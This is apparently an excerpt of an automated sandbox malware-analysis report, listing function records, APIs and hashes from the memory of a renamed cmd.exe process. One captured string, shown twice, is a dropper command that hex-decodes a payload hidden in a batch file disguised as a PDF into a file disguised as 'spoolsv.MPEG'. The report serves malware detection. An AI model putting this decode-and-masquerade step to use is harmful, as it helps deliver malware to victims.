                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                      • String ID: <noalias>$CMD.EXE
                                      • API String ID: 1161012917-1690691951
                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction ID: 7f85f301128a83fe36914602a667398bcf9620d9622955d0ff0358fb50793b3b
                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction Fuzzy Hash: 5F91A3ABB0868386FB55BB60D8001BDAAA0AF4AF5DFCC5135DD1E426D5DF3CA445C320
                                      Function 00007FF755CACE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 , xrefs: 00007FF755CBC9F1
                                      • GOTO, xrefs: 00007FF755CAD0A3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                      • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 $GOTO
                                      • API String ID: 3863671652-294573629
                                      • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction ID: 78ad319447d94514cd48535676afd331a9b85d58ed1a9bce6f424c472d0d0ee4
                                      • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction Fuzzy Hash: 0CE1ADAFE0968386FA61BB14D4543B9ABA0AF45F58FCC4935DA1E462D1DF3CE841C720
                                      Function 00007FF755CA2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$BufferConsoleInfoScreen
                                      • String ID:
                                      • API String ID: 1034426908-0
                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction ID: 193145b707c10f73b67f6362c5f895428b69949868a30531b33e6f607f9ee92b
                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction Fuzzy Hash: ADF1C2BBA0878389EB64EB21D8402E9ABA4FF45F4CF889530DA5E47695DF3CE544C710
                                      Function 00007FF755CCAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAA85
                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAACF
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAAEC
                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB39
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB6F
                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABA4
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseDeleteValue$CreateOpen
                                      • String ID: %s=%s
                                      • API String ID: 1019019434-1087296587
                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction ID: 06d47f305885bbba12c6486de8bbf13b6ca01b7b141c232c4317ce6e08b46718
                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction Fuzzy Hash: 4F51EAB7B1878386E760AB25E85477AF6E1FB89F44F885230CA5D83B94DF78D4418710
                                      Function 00007FF755CA4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$FullNamePathwcsrchr
                                      • String ID:
                                      • API String ID: 4289998964-0
                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction ID: 2bc3dc30813f671f8d3d0ba32f3f60f20a57944b64d7716b4676c0e0c261bc94
                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction Fuzzy Hash: 1EC1E5ABB0974782EA94BB91D548379E7A0FB45F98F886530CE5E037D0DF7CA4918320
                                      Function 00007FF755CAD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 2081463915-1994581435
                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction ID: 7f187be84442132dabe8ac86962a60c902c156e88d21872a9b076c7b24e859c9
                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction Fuzzy Hash: 6E71A2EBE0864785FBA5BB64E454279AAE0AF01F5CFCC4939D50D426D1DF3CA481C760
                                      Function 00007FF755CB02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$iswspacewcschr
                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                      • API String ID: 840959033-3627297882
                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction ID: 84ccae9cf6bb8ef8ba266d600c495aba10c69bcca11557a0e2c2c3b5d9a0dc12
                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction Fuzzy Hash: 97D17DABE0864386FB50BB21E8552B9A7A0EF44F5CFCC9435CA4D86295DF3CE8458770
                                      Function 00007FF755CA32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA32F3
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF755CA32A4), ref: 00007FF755CA3309
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CA3384
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC11DF
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                      • String ID:
                                      • API String ID: 611521582-0
                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction ID: 2c281a3b56d7b0a81a2ee9769d386d17df84a74188b3925059ab50db176404af
                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction Fuzzy Hash: AEA1A3BBF0865386EB14AB65E8142BDEBA1FF49F5DF885135CD0E86B44DF3C94458220
                                      Function 00007FF755CB26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateFile_open_osfhandle
                                      • String ID: con
                                      • API String ID: 2905481843-4257191772
                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction ID: 374f612b63c3c6b251445eaf95032d11491ccb1462b95c464da7b55460eaf717
                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction Fuzzy Hash: 7471DAB7A086838AE360AF54E440679F6A0FB4AF75FD84234DA5E42794DF3CD445C710
                                      Function 00007FF755CD1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                      • String ID: CSVFS$NTFS$REFS
                                      • API String ID: 3510147486-2605508654
                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction ID: 8999e5da9e8b63699fbe65cc9a7a1410ec433d09ddf45d9770235587c1a7e28e
                                      • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction Fuzzy Hash: D9616E77704BC68AEBA19F21D8443E9B7A4FB85B88F884135CA0D8B758DF78D245C710
                                      Function 00007FF755CA72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                      Download Yara Rule
                                      APIs
                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF755CA7279,?,?,?,?,?,00007FF755CABFA9), ref: 00007FF755CC4485
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: longjmp
                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                      • API String ID: 1832741078-366822981
                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction ID: da8f60e380d817feaad94abab3b5c6df8d613936da68d362f1436af081f7be86
                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction Fuzzy Hash: 3AC1B2EAF0C68381E664FB0591805B8A7A1BB46F8EFDDA072CD1D97691CF6CE445C320
                                      Function 00007FF755CB662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB6677
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB668F
                                      • _errno.MSVCRT ref: 00007FF755CB66A3
                                      • wcstol.MSVCRT ref: 00007FF755CB66C4
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66E4
                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66FE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                      • API String ID: 2348642995-441775793
                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction ID: ed0af47234d59f2dfbb3ea1ef21544d7b0fa30bcb17536f4110cc0718e4b0a73
                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction Fuzzy Hash: 16715FABD08A8785E7606F21D450179F7A0FB45FA8BDCD135DA8E56394EF3CA884C720
                                      Function 00007FF755CA86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$_wcsicmp$AllocProcess
                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                      • API String ID: 3223794493-3086019870
                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction ID: a23ddf87c2a92a25503956f8c4780e9105f9a88ccf1d372a7933706ae566c492
                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction Fuzzy Hash: EB5181ABA08B4386EA55AB15E810179BBA0FF49F58FDC9534C95E473A0DF7CE441C720
                                      Function 00007FF755CC86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                      • String ID: %s$/-.$:
                                      • API String ID: 1644023181-879152773
                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction ID: fdda612b7bf8bffc6e77382479fc40c05c868aa9cc8fe6cef8ef02a5e765e1ac
                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction Fuzzy Hash: 5191B3ABA0864391EF50EB60D4502BAE7A0FF84F98FCC5535DA5E46AD4EE3CE545C320
                                      Function 00007FF755CC627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CC7251), ref: 00007FF755CC628E
                                      Strings
                                      Memory Dump Source
